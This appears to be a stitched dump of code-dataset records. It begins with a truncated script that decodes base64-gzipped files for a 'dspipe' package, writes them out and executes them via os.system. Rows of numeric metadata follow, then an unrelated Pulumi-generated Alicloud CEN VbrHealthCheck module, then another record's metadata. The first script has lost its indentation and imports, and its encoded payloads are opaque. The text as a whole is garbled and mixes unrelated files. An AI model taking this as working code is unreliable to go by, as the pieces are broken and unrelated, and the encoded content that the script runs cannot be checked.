file_data: Dict = {'dspipe/run.py': 'H4sIABHm3l4C/5VTy27bMBC86ysW8UUCBClWmwAt4FPT9tJbczc25NoiQpECd2nX/fqSkmIIqNHHRQ8OObszOzTD6IPAi7fyXnNzsP4MyKAfJX8WZobV4ViDIL9yDSfDEa35SUWxgU89qdcJAU0jOU1OGWJAp0F6MgHoB6koxjtgQYlcLNTNGOhk6FxOtM1zej4HNK6sqkz8eTpGmQQGr8mCZNS441zNOGWjzr/rug18J4JeZOSPbftWKRDqxKO94sb4llxrUYilDdE1vQz22lNauNXPZo1/Jfnmj8Y9oWBZ1awSc7QU9r1n2d09dE3XbZvu/l2zffhwt8Kzk7tt97itrVdo91dk9wUt0yQ7MoGPMkYprj43qFQMqC5ltVocrZf9PB50iriczqse3ZFgxIADCYVpEIFS3zXw/1iD+jSR/N0f7fdplGPwqQlepFS3ur+1ETbzOGfNYHjVOo+kzMGorGuSAHM6DxlUKROLWn5L6fyy5qW4fiWB1qMuU4Cr31cnKZNvjBe4+Lgwasjy0qDzjOtUnEkArZ2vwJK4nL2U6tXOq03GnZJ2nZzca392LMnmYWXcsj+lB26l/x9uyJ8D+ws98yvB1QMAAA==', 'dspipe/cfg.py': 'H4sIABHm3l4C/22NMQrDMAxFd59C0MEOBJNkyFDILboHY4ticGIjKdDcvnZDO1WT9Ph6P+S1EBbKHplhgQcdqFTcSiaB4AQlbqiCrCyukuXHbFvMNExDP/dj1yK4h/+BcWoJdYOUXYBaJugFA3jCgLtEl1gJnXcFdb7ds5RY8IMOik18EXtITGyb6nRbMto2Ddt26M4+UYyuD7pT+PJY5LIWx/wGshwvjOwAAAA=', 'dspipe/tasks.py': 'H4sIABHm3l4C/7VVy27bMBC86ysI+CAJsOU0CIrAgIqiLdL2ZrS9BYbBiCubDUUqJJUgKPrv3aWedpO06cPwQSJ3hzPL2dVMVrWxnomXvlTmLuper4zyZ8JltMa4e2o789xdu35HNXIn+xd3rYBbPe8fMsExGLyLSmuqYRW0g+pKAevSPnEtTHVhLDj/VnHnZCnB9qA17iIj/NciivrVotxF0YwJKKUGdmfsdeBbUDr7ggzfg3+HpyedkpZ1Rjvrm3WATFeMzZjjt8CIZ2l5BeEYbm8a8KgCgO29r91quexhLHDh9yBM4TJplqCXinvkvfTc7lBptveVihj+hN86XPQsb4uUIR1YczrFg02QOW+Uz1FI1oemyKeXQjTaUJexz89hwsVtyD2gAlr8HhEMTEOSKxC8UWC3e+NGFWNiiArwHUKsTMEVRcfzyaYrrKy9NDqPP+CepjKbklW82NPd2UZrqXfMQmU8jMdOMAqjS7nb1tzvcyELnzgoWsACTRPPGWHmccdjMUAsApf0WE8wUK/no/ZPSDo/OT99RMuaUFDHMW/Ga8lqawpw7l9oILakIep4UcEwWZXpagCXVjpUdNx2mTJcbGkzSUcR5dZbLjXG14K8wC9IfkJhIXNeGNVU2uWXcQncNxa+fY+z0tiK+0SmDJ+YZAhgud5BcpZufga/jO/jDZ4QQNvWGGJmzIQScrUa48dEpADx5lVOEofO2AzZYZmaNulTqGtuGllcq/ujbo6i12O3YAgOmGQyGyixGyACajQ+6OL+mc3WjpXQaePsWVvoDPDk+Glv1GzrIXxw5Rtj1CMtOo0nBcOcCBcz7lFP3YNbavOkdSZ2CKWVum58kgbrJNPS0gLryihCjZ89IftSzQhrEU5aENDo47IlcSBy5Drlm0mcNper+WrxYjOx/oH+zOE8Go0yTUl/YahgJGLMTOOR559rJaRFC9KKfcSU64Nb/S++/ELqHrIk3TDg97DT3bIN38Kw8xcGGsIqI0BhzMMf+0Rvv5orl5/OaapgALW9h/zkCCArpX/wPueHo+eh6w0A6Q+tM9zBAQkAAA==', 'dspipe/__init__.py': 'H4sIABHm3l4C/wMAAAAAAAAAAAA=', 'dspipe/visualize.py': 'H4sIABHm3l4C/62SwWrEIBCG73mK3KKQTul1IdeeC93bsoRZnQRZo+KYpfv2Nclm27QLvVREnNFv/H/VDMHHVPLZEkZXmCVMyGdeg4BOI5e5B12sSdX1RaGpK1GpMaK6Cu3bEClEr4i5yeuwychdUeY2eE22bJYTYJ/HfUTjftBbEvyYwpiEBOtRCzkX0l2bJnJT6+0OicdUiMYlcXMLA6VoFMPqoWXlI4m19KG6Vsd6VgxZjjYq3dfAWK8Ou3r39HKUUi53EaxP7XJB6LIK8Yfp/3SWqa+TMxo0vFM0WcRioCNMY6Tv8tq6NE7TR/PIFChvx8HxUv326gOmyaM1JwjXaTb/Cpt+KwDOk/aCdswKkBU5bVzfvKJlkjChcMK4vopNwHihzvSiykYzys/znuD6Sn4ClRfcn6QCAAA=', 'dspipe/export.py': 'H4sIABHm3l4C/5VRPW/bMBDd9SsO8GAZMKgl6BDAW5uMHRogY8CIJ4sIxRPIYxz/+95RktumXapB0n29e+/dDn6MNvl4hmdKb0OgSwYbHXwvPBfOzQ4yIozMc77vOveFtcUktI5HdNRn46nD2AXLmLnrKQT7SkkiM/IUGj/NlBheKfCdy0anwWZYgf5VNrOfMTdbiW1+k2gHtjBBtu+4DYOzbEGSEusMJJyp6YfzS41OsNdvtBPul2yiwYdacDjYEnjfbILqTuOj53YDOK79p99mjxCot6HWT0+p4AF2cBHjwMelBBM5hMGnzEoaP7AvLAkVq1Jke1VknuT9iPxVNLSHG49UYqt1xaV6gqp7suwFPFyrAU63VY3OJ+yZ0vVm0BkjqvugdDMMlBabeoq5TJjUL1nySfiD/H77UL/r9uPmwcFseMJRVlxGjHClAjap3dZdFW8ueVzZHnVRFE51D04kTBSocfRS207wYEPGxg+wpu4bkOe/D5EwIy83qADrzf/EOSNXiHbp2dUuM5cgJ0z47vHyd6X9hWeU36fOW749/AQCGRaFPAMAAA==', 'setup.py': 'H4sIABHm3l4C/0srys9VKE4tKS0oyc/PKVbIzC3ILyqBiOgopGXmpcQXJCZnJ6anFnNxgUU1uBSAIC8xN9VWPaW4ILMgVV0HLFSWWlScmZ9nq26gZwgVgmm1RTFIQ1OHSxMAGQWxpHkAAAA=', 'dspipe/README.md': 'H4sIABHm3l4C/41SwY7UMAy95yss7QGQmPbCaW8IiRNISMsFIbTjpm6bndSJEoeZ8vU4me4CKw57apo8Pz+/5xsYgpd3Y+4mH85wgC8pPJAV+Epr9CiUzc0NfPCEDMgjZIseB08Qd1yWVKyURDCFBCMKKsYR2ydINuaJDM5OFrBhXQPDSNnNDBFFKHFuBItIzLd9PyuuDJ0ie08UtXW/C+2rUFNV3T22NuYomE9d3I63cA7p1GapVxnAHO00X58iJlxJm7VRgix6soEnN1dYKnyF0YVsEfoP00+XC3r3i67AkglCkVjkKn4qqXEio9+ye1bi4sbDsyrH8FDiViVxEBpCONWizibSSDZcvRaEKC4oJUxOjW8OqrWi1tIIFUksDn1j+15rqpgV5cfrRzfHYHOHnJ0m1zzdz30LRfpEE6Wa2T3GSDw6S7n/9v7zp7uNBS/dIqt/87ZKbNm52lgCaEj1s4v5RwqYP3szJGS7GPNRLUoUCUU9wJlgCwXGwK8EmJQRvQdZgtpTmyhTbjlZpaieqbVg/yLslD4w6dSqQW/p4rI4nnV6P6qhJdefYxVpG/Aw7PWHQ33ydLgSvWTpxnwv+xJ3lbE7mt9ZbPhCOwMAAA==', 'dspipe/reports/README.md': 'H4sIABHm3l4C/1NWVihKLcgvKilW0C3IS9fT0wMADNJGVRIAAAA='}
for path, encoded in file_data.items():
print(path)
path = Path(path)
path.parent.mkdir(exist_ok=True)
path.write_bytes(gzip.decompress(base64.b64decode(encoded)))
def run(command):
os.system('export PYTHONPATH=${PYTHONPATH}:/dspipe/working && ' + command)
run('python setup.py develop --install-dir /dspipe/working')
run('python dspipe/run.py')
| 179.72
| 3,996
| 0.920766
| 217
| 4,493
| 19.02765
| 0.728111
| 0.023735
| 0.008719
| 0.00775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131226
| 0.021367
| 4,493
| 24
| 3,997
| 187.208333
| 0.807824
| 0.007567
| 0
| 0
| 0
| 0.333333
| 0.904196
| 0.858874
| 0
| 1
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0
| 0.333333
| 0
| 0.4
| 0.066667
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c3a91d04243263af5f3542025c55fcf9076522af
| 25,875
|
py
|
Python
|
sdk/python/pulumi_alicloud/cen/vbr_health_check.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/cen/vbr_health_check.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/cen/vbr_health_check.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['VbrHealthCheckArgs', 'VbrHealthCheck']
@pulumi.input_type
class VbrHealthCheckArgs:
def __init__(__self__, *,
cen_id: pulumi.Input[str],
health_check_target_ip: pulumi.Input[str],
vbr_instance_id: pulumi.Input[str],
vbr_instance_region_id: pulumi.Input[str],
health_check_interval: Optional[pulumi.Input[int]] = None,
health_check_source_ip: Optional[pulumi.Input[str]] = None,
healthy_threshold: Optional[pulumi.Input[int]] = None,
vbr_instance_owner_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a VbrHealthCheck resource.
:param pulumi.Input[str] cen_id: The ID of the CEN instance.
:param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
:param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
:param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
:param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
:param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
:param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
:param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
"""
pulumi.set(__self__, "cen_id", cen_id)
pulumi.set(__self__, "health_check_target_ip", health_check_target_ip)
pulumi.set(__self__, "vbr_instance_id", vbr_instance_id)
pulumi.set(__self__, "vbr_instance_region_id", vbr_instance_region_id)
if health_check_interval is not None:
pulumi.set(__self__, "health_check_interval", health_check_interval)
if health_check_source_ip is not None:
pulumi.set(__self__, "health_check_source_ip", health_check_source_ip)
if healthy_threshold is not None:
pulumi.set(__self__, "healthy_threshold", healthy_threshold)
if vbr_instance_owner_id is not None:
pulumi.set(__self__, "vbr_instance_owner_id", vbr_instance_owner_id)
@property
@pulumi.getter(name="cenId")
def cen_id(self) -> pulumi.Input[str]:
"""
The ID of the CEN instance.
"""
return pulumi.get(self, "cen_id")
@cen_id.setter
def cen_id(self, value: pulumi.Input[str]):
pulumi.set(self, "cen_id", value)
@property
@pulumi.getter(name="healthCheckTargetIp")
def health_check_target_ip(self) -> pulumi.Input[str]:
"""
The destination IP address of health checks.
"""
return pulumi.get(self, "health_check_target_ip")
@health_check_target_ip.setter
def health_check_target_ip(self, value: pulumi.Input[str]):
pulumi.set(self, "health_check_target_ip", value)
@property
@pulumi.getter(name="vbrInstanceId")
def vbr_instance_id(self) -> pulumi.Input[str]:
"""
The ID of the VBR.
"""
return pulumi.get(self, "vbr_instance_id")
@vbr_instance_id.setter
def vbr_instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vbr_instance_id", value)
@property
@pulumi.getter(name="vbrInstanceRegionId")
def vbr_instance_region_id(self) -> pulumi.Input[str]:
"""
The ID of the region to which the VBR belongs.
"""
return pulumi.get(self, "vbr_instance_region_id")
@vbr_instance_region_id.setter
def vbr_instance_region_id(self, value: pulumi.Input[str]):
pulumi.set(self, "vbr_instance_region_id", value)
@property
@pulumi.getter(name="healthCheckInterval")
def health_check_interval(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
"""
return pulumi.get(self, "health_check_interval")
@health_check_interval.setter
def health_check_interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "health_check_interval", value)
@property
@pulumi.getter(name="healthCheckSourceIp")
def health_check_source_ip(self) -> Optional[pulumi.Input[str]]:
"""
The source IP address of health checks.
"""
return pulumi.get(self, "health_check_source_ip")
@health_check_source_ip.setter
def health_check_source_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check_source_ip", value)
@property
@pulumi.getter(name="healthyThreshold")
def healthy_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
"""
return pulumi.get(self, "healthy_threshold")
@healthy_threshold.setter
def healthy_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "healthy_threshold", value)
@property
@pulumi.getter(name="vbrInstanceOwnerId")
def vbr_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the account to which the VBR belongs.
"""
return pulumi.get(self, "vbr_instance_owner_id")
@vbr_instance_owner_id.setter
def vbr_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "vbr_instance_owner_id", value)
@pulumi.input_type
class _VbrHealthCheckState:
def __init__(__self__, *,
cen_id: Optional[pulumi.Input[str]] = None,
health_check_interval: Optional[pulumi.Input[int]] = None,
health_check_source_ip: Optional[pulumi.Input[str]] = None,
health_check_target_ip: Optional[pulumi.Input[str]] = None,
healthy_threshold: Optional[pulumi.Input[int]] = None,
vbr_instance_id: Optional[pulumi.Input[str]] = None,
vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
vbr_instance_region_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering VbrHealthCheck resources.
:param pulumi.Input[str] cen_id: The ID of the CEN instance.
:param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
:param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
:param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
:param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
:param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
:param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
:param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
"""
if cen_id is not None:
pulumi.set(__self__, "cen_id", cen_id)
if health_check_interval is not None:
pulumi.set(__self__, "health_check_interval", health_check_interval)
if health_check_source_ip is not None:
pulumi.set(__self__, "health_check_source_ip", health_check_source_ip)
if health_check_target_ip is not None:
pulumi.set(__self__, "health_check_target_ip", health_check_target_ip)
if healthy_threshold is not None:
pulumi.set(__self__, "healthy_threshold", healthy_threshold)
if vbr_instance_id is not None:
pulumi.set(__self__, "vbr_instance_id", vbr_instance_id)
if vbr_instance_owner_id is not None:
pulumi.set(__self__, "vbr_instance_owner_id", vbr_instance_owner_id)
if vbr_instance_region_id is not None:
pulumi.set(__self__, "vbr_instance_region_id", vbr_instance_region_id)
@property
@pulumi.getter(name="cenId")
def cen_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the CEN instance.
"""
return pulumi.get(self, "cen_id")
@cen_id.setter
def cen_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cen_id", value)
@property
@pulumi.getter(name="healthCheckInterval")
def health_check_interval(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
"""
return pulumi.get(self, "health_check_interval")
@health_check_interval.setter
def health_check_interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "health_check_interval", value)
@property
@pulumi.getter(name="healthCheckSourceIp")
def health_check_source_ip(self) -> Optional[pulumi.Input[str]]:
"""
The source IP address of health checks.
"""
return pulumi.get(self, "health_check_source_ip")
@health_check_source_ip.setter
def health_check_source_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check_source_ip", value)
@property
@pulumi.getter(name="healthCheckTargetIp")
def health_check_target_ip(self) -> Optional[pulumi.Input[str]]:
"""
The destination IP address of health checks.
"""
return pulumi.get(self, "health_check_target_ip")
@health_check_target_ip.setter
def health_check_target_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "health_check_target_ip", value)
@property
@pulumi.getter(name="healthyThreshold")
def healthy_threshold(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
"""
return pulumi.get(self, "healthy_threshold")
@healthy_threshold.setter
def healthy_threshold(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "healthy_threshold", value)
@property
@pulumi.getter(name="vbrInstanceId")
def vbr_instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the VBR.
"""
return pulumi.get(self, "vbr_instance_id")
@vbr_instance_id.setter
def vbr_instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vbr_instance_id", value)
@property
@pulumi.getter(name="vbrInstanceOwnerId")
def vbr_instance_owner_id(self) -> Optional[pulumi.Input[int]]:
"""
The ID of the account to which the VBR belongs.
"""
return pulumi.get(self, "vbr_instance_owner_id")
@vbr_instance_owner_id.setter
def vbr_instance_owner_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "vbr_instance_owner_id", value)
@property
@pulumi.getter(name="vbrInstanceRegionId")
def vbr_instance_region_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the region to which the VBR belongs.
"""
return pulumi.get(self, "vbr_instance_region_id")
@vbr_instance_region_id.setter
def vbr_instance_region_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vbr_instance_region_id", value)
class VbrHealthCheck(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cen_id: Optional[pulumi.Input[str]] = None,
health_check_interval: Optional[pulumi.Input[int]] = None,
health_check_source_ip: Optional[pulumi.Input[str]] = None,
health_check_target_ip: Optional[pulumi.Input[str]] = None,
healthy_threshold: Optional[pulumi.Input[int]] = None,
vbr_instance_id: Optional[pulumi.Input[str]] = None,
vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
vbr_instance_region_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This topic describes how to configure the health check feature for a Cloud Enterprise Network (CEN) instance.
After you attach a Virtual Border Router (VBR) to the CEN instance and configure the health check feature, you can monitor the network conditions of the on-premises data center connected to the VBR.
For information about CEN VBR HealthCheck and how to use it, see [Manage CEN VBR HealthCheck](https://www.alibabacloud.com/help/en/doc-detail/71141.htm).
> **NOTE:** Available in 1.88.0+
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
# Create a cen vbr HealrhCheck resource and use it.
default_instance = alicloud.cen.Instance("defaultInstance", cen_instance_name="test_name")
default_instance_attachment = alicloud.cen.InstanceAttachment("defaultInstanceAttachment",
instance_id=default_instance.id,
child_instance_id="vbr-xxxxx",
child_instance_type="VBR",
child_instance_region_id="cn-hangzhou")
default_vbr_health_check = alicloud.cen.VbrHealthCheck("defaultVbrHealthCheck",
cen_id=default_instance.id,
health_check_source_ip="192.168.1.2",
health_check_target_ip="10.0.0.2",
vbr_instance_id="vbr-xxxxx",
vbr_instance_region_id="cn-hangzhou",
health_check_interval=2,
healthy_threshold=8,
opts=pulumi.ResourceOptions(depends_on=[default_instance_attachment]))
```
## Import
CEN VBR HealthCheck can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cen/vbrHealthCheck:VbrHealthCheck example vbr-xxxxx:cn-hangzhou
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cen_id: The ID of the CEN instance.
:param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
:param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
:param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
:param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
:param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
:param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
:param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VbrHealthCheckArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This topic describes how to configure the health check feature for a Cloud Enterprise Network (CEN) instance.
After you attach a Virtual Border Router (VBR) to the CEN instance and configure the health check feature, you can monitor the network conditions of the on-premises data center connected to the VBR.
For information about CEN VBR HealthCheck and how to use it, see [Manage CEN VBR HealthCheck](https://www.alibabacloud.com/help/en/doc-detail/71141.htm).
> **NOTE:** Available in 1.88.0+
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
# Create a cen vbr HealrhCheck resource and use it.
default_instance = alicloud.cen.Instance("defaultInstance", cen_instance_name="test_name")
default_instance_attachment = alicloud.cen.InstanceAttachment("defaultInstanceAttachment",
instance_id=default_instance.id,
child_instance_id="vbr-xxxxx",
child_instance_type="VBR",
child_instance_region_id="cn-hangzhou")
default_vbr_health_check = alicloud.cen.VbrHealthCheck("defaultVbrHealthCheck",
cen_id=default_instance.id,
health_check_source_ip="192.168.1.2",
health_check_target_ip="10.0.0.2",
vbr_instance_id="vbr-xxxxx",
vbr_instance_region_id="cn-hangzhou",
health_check_interval=2,
healthy_threshold=8,
opts=pulumi.ResourceOptions(depends_on=[default_instance_attachment]))
```
## Import
CEN VBR HealthCheck can be imported using the id, e.g.
```sh
$ pulumi import alicloud:cen/vbrHealthCheck:VbrHealthCheck example vbr-xxxxx:cn-hangzhou
```
:param str resource_name: The name of the resource.
:param VbrHealthCheckArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VbrHealthCheckArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cen_id: Optional[pulumi.Input[str]] = None,
health_check_interval: Optional[pulumi.Input[int]] = None,
health_check_source_ip: Optional[pulumi.Input[str]] = None,
health_check_target_ip: Optional[pulumi.Input[str]] = None,
healthy_threshold: Optional[pulumi.Input[int]] = None,
vbr_instance_id: Optional[pulumi.Input[str]] = None,
vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
vbr_instance_region_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VbrHealthCheckArgs.__new__(VbrHealthCheckArgs)
if cen_id is None and not opts.urn:
raise TypeError("Missing required property 'cen_id'")
__props__.__dict__["cen_id"] = cen_id
__props__.__dict__["health_check_interval"] = health_check_interval
__props__.__dict__["health_check_source_ip"] = health_check_source_ip
if health_check_target_ip is None and not opts.urn:
raise TypeError("Missing required property 'health_check_target_ip'")
__props__.__dict__["health_check_target_ip"] = health_check_target_ip
__props__.__dict__["healthy_threshold"] = healthy_threshold
if vbr_instance_id is None and not opts.urn:
raise TypeError("Missing required property 'vbr_instance_id'")
__props__.__dict__["vbr_instance_id"] = vbr_instance_id
__props__.__dict__["vbr_instance_owner_id"] = vbr_instance_owner_id
if vbr_instance_region_id is None and not opts.urn:
raise TypeError("Missing required property 'vbr_instance_region_id'")
__props__.__dict__["vbr_instance_region_id"] = vbr_instance_region_id
super(VbrHealthCheck, __self__).__init__(
'alicloud:cen/vbrHealthCheck:VbrHealthCheck',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cen_id: Optional[pulumi.Input[str]] = None,
health_check_interval: Optional[pulumi.Input[int]] = None,
health_check_source_ip: Optional[pulumi.Input[str]] = None,
health_check_target_ip: Optional[pulumi.Input[str]] = None,
healthy_threshold: Optional[pulumi.Input[int]] = None,
vbr_instance_id: Optional[pulumi.Input[str]] = None,
vbr_instance_owner_id: Optional[pulumi.Input[int]] = None,
vbr_instance_region_id: Optional[pulumi.Input[str]] = None) -> 'VbrHealthCheck':
"""
Get an existing VbrHealthCheck resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cen_id: The ID of the CEN instance.
:param pulumi.Input[int] health_check_interval: Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
:param pulumi.Input[str] health_check_source_ip: The source IP address of health checks.
:param pulumi.Input[str] health_check_target_ip: The destination IP address of health checks.
:param pulumi.Input[int] healthy_threshold: Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
:param pulumi.Input[str] vbr_instance_id: The ID of the VBR.
:param pulumi.Input[int] vbr_instance_owner_id: The ID of the account to which the VBR belongs.
:param pulumi.Input[str] vbr_instance_region_id: The ID of the region to which the VBR belongs.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _VbrHealthCheckState.__new__(_VbrHealthCheckState)
__props__.__dict__["cen_id"] = cen_id
__props__.__dict__["health_check_interval"] = health_check_interval
__props__.__dict__["health_check_source_ip"] = health_check_source_ip
__props__.__dict__["health_check_target_ip"] = health_check_target_ip
__props__.__dict__["healthy_threshold"] = healthy_threshold
__props__.__dict__["vbr_instance_id"] = vbr_instance_id
__props__.__dict__["vbr_instance_owner_id"] = vbr_instance_owner_id
__props__.__dict__["vbr_instance_region_id"] = vbr_instance_region_id
return VbrHealthCheck(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="cenId")
def cen_id(self) -> pulumi.Output[str]:
"""
The ID of the CEN instance.
"""
return pulumi.get(self, "cen_id")
@property
@pulumi.getter(name="healthCheckInterval")
def health_check_interval(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the interval at which the health check sends continuous detection packets. Default value: 2. Value range: 2 to 3.
"""
return pulumi.get(self, "health_check_interval")
@property
@pulumi.getter(name="healthCheckSourceIp")
def health_check_source_ip(self) -> pulumi.Output[Optional[str]]:
"""
The source IP address of health checks.
"""
return pulumi.get(self, "health_check_source_ip")
@property
@pulumi.getter(name="healthCheckTargetIp")
def health_check_target_ip(self) -> pulumi.Output[str]:
"""
The destination IP address of health checks.
"""
return pulumi.get(self, "health_check_target_ip")
@property
@pulumi.getter(name="healthyThreshold")
def healthy_threshold(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the number of probe messages sent by the health check. Default value: 8. Value range: 3 to 8.
"""
return pulumi.get(self, "healthy_threshold")
@property
@pulumi.getter(name="vbrInstanceId")
def vbr_instance_id(self) -> pulumi.Output[str]:
"""
The ID of the VBR.
"""
return pulumi.get(self, "vbr_instance_id")
@property
@pulumi.getter(name="vbrInstanceOwnerId")
def vbr_instance_owner_id(self) -> pulumi.Output[Optional[int]]:
"""
The ID of the account to which the VBR belongs.
"""
return pulumi.get(self, "vbr_instance_owner_id")
@property
@pulumi.getter(name="vbrInstanceRegionId")
def vbr_instance_region_id(self) -> pulumi.Output[str]:
"""
The ID of the region to which the VBR belongs.
"""
return pulumi.get(self, "vbr_instance_region_id")
| 46.288014
| 206
| 0.670686
| 3,279
| 25,875
| 4.993596
| 0.070753
| 0.080616
| 0.057286
| 0.039453
| 0.899841
| 0.888237
| 0.884573
| 0.869305
| 0.86619
| 0.854159
| 0
| 0.004602
| 0.235865
| 25,875
| 558
| 207
| 46.370968
| 0.823538
| 0.336155
| 0
| 0.720137
| 1
| 0
| 0.135049
| 0.067652
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16041
| false
| 0.003413
| 0.017065
| 0
| 0.273038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3bc2c3b6896e186793d6fcb0281c38136f93bed
| 4,235
|
py
|
Python
|
care/facility/migrations/0067_auto_20200402_1841.py
|
gigincg/care
|
07be6a7982b5c46a854e3435a52662f32800c8ae
|
[
"MIT"
